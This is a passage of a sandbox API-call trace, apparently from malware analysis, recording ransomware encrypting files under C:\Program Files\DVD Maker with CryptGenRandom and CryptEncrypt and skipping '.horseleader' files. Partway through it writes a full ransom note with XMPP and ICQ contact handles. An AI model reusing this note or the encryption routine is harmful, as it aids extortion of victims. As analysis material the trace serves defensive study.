pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0251.787] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7079e029, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7079e029, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.787] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.787] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png") returned 93 [0251.787] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.787] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.787] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.787] lstrlenW (lpString=".testttjffg") returned 11 [0251.787] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.787] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.787] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\resizingpanels\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.788] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707ea2e3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x707ea2e3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efc9a7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.788] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png") returned 99 [0251.788] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.788] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.788] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.788] lstrlenW (lpString=".testttjffg") returned 11 [0251.788] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.788] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.788] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 
[0251.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.788] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70940f28, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70940f28, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efc9a7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84ca6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Panel_Mask.wmv", cAlternateFileName="")) returned 1 [0251.788] lstrcmpiW (lpString1="Panel_Mask.wmv", lpString2="Windows") returned -1 [0251.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv") returned 77 [0251.788] StrStrIW (lpFirst="Panel_Mask.wmv", lpSrch=".horseleader") returned 0x0 [0251.789] lstrcmpW (lpString1="Panel_Mask.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.789] lstrcmpW (lpString1="Panel_Mask.wmv", lpString2="_uninstalling_.png") returned 1 [0251.789] lstrlenW (lpString=".testttjffg") returned 11 [0251.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv", lpSrch=".testttjffg") returned 0x0 [0251.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.789] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709b333f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x709b333f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f0d440f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84702, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Panel_Mask_PAL.wmv", cAlternateFileName="")) returned 1 [0251.789] lstrcmpiW (lpString1="Panel_Mask_PAL.wmv", lpString2="Windows") returned -1 [0251.789] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv") returned 81 [0251.789] StrStrIW (lpFirst="Panel_Mask_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.789] lstrcmpW (lpString1="Panel_Mask_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.789] lstrcmpW (lpString1="Panel_Mask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.789] lstrlenW (lpString=".testttjffg") returned 11 [0251.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.790] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709b333f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x709b333f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f0d440f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84702, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Panel_Mask_PAL.wmv", cAlternateFileName="")) returned 0 [0251.790] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\#Decrypt#.txt") returned 76 [0251.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.793] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new 
account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.793] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.794] lstrlenA (lpString="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") returned 1368 [0251.794] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.795] CloseHandle (hObject=0x158) returned 1 [0251.795] GetProcessHeap () returned 0x780000 [0251.795] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.795] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e91e8b0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e91e8b0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="scene_button_style_default_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.795] lstrcmpiW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.795] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp") returned 88 [0251.795] StrStrIW (lpFirst="scene_button_style_default_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.795] lstrcmpW (lpString1="scene_button_style_default_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.795] lstrcmpW (lpString1="scene_button_style_default_Thumbnail.bmp", 
lpString2="_uninstalling_.png") returned 1 [0251.795] lstrlenW (lpString=".testttjffg") returned 11 [0251.795] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\scene_button_style_default_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.796] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8d25f6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8d25f6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd86, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="shadowonlyframe_buttongraphic.png", cAlternateFileName="")) returned 1 [0251.796] lstrcmpiW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="Windows") returned -1 [0251.796] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png") returned 81 [0251.796] StrStrIW (lpFirst="shadowonlyframe_buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.796] lstrcmpW 
(lpString1="shadowonlyframe_buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.796] lstrcmpW (lpString1="shadowonlyframe_buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.796] lstrlenW (lpString=".testttjffg") returned 11 [0251.796] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.797] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8f8753, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8f8753, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd3e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="shadowonlyframe_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0251.797] lstrcmpiW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="Windows") returned -1 [0251.797] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png") returned 87 [0251.797] 
StrStrIW (lpFirst="shadowonlyframe_selectionsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.797] lstrcmpW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.797] lstrcmpW (lpString1="shadowonlyframe_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.797] lstrlenW (lpString=".testttjffg") returned 11 [0251.797] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.797] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.797] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.797] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8ac499, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8ac499, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="shadowonlyframe_videoinset.png", cAlternateFileName="")) returned 1 [0251.797] lstrcmpiW (lpString1="shadowonlyframe_videoinset.png", lpString2="Windows") returned -1 [0251.797] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png") returned 78 [0251.797] StrStrIW (lpFirst="shadowonlyframe_videoinset.png", lpSrch=".horseleader") returned 0x0 [0251.797] lstrcmpW (lpString1="shadowonlyframe_videoinset.png", lpString2="#Decrypt#.txt") returned 1 [0251.797] lstrcmpW (lpString1="shadowonlyframe_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0251.797] lstrlenW (lpString=".testttjffg") returned 11 [0251.797] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", lpSrch=".testttjffg") returned 0x0 [0251.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.798] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Shatter", cAlternateFileName="")) returned 1 [0251.798] lstrcmpiW (lpString1="Shatter", lpString2="Windows") returned -1 [0251.798] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 55 [0251.798] lstrcmpW (lpString1="Shatter", lpString2=".") returned 1 [0251.798] lstrcmpW (lpString1="Shatter", lpString2="..") returned 1 [0251.798] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.798] GetProcessHeap () returned 0x780000 [0251.798] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.798] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*") returned 57 [0251.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.811] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\.") returned 57 [0251.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.811] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.811] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.811] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\..") returned 58 [0251.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.811] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.811] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.811] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png") returned 73 [0251.811] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.811] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.811] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.811] lstrlenW (lpString=".testttjffg") returned 11 [0251.811] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.811] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.811] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
